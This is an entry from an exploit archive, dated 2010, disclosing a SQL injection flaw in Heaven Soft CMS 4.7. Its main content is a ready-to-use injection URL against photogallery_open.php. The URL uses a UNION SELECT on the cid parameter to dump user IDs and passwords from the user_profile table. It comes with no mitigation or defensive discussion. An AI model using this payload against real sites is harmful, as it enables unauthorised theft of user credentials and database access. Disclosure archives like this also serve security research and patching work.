Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability
# Published : 2010-05-14
# Author : CoBRa_21
# Previous Title : Joomla Component com_jequoteform - Local File Inclusion
# Next Title : VMware View Portal <= 3.1 XSS vulnerability

-------------------------------------------------------------------------------------------
 
Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://www.heavensoft.com.pk/

-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--

-------------------------------------------------------------------------------------------

Melekler Bize Aglar , Biz Halimize Guleriz......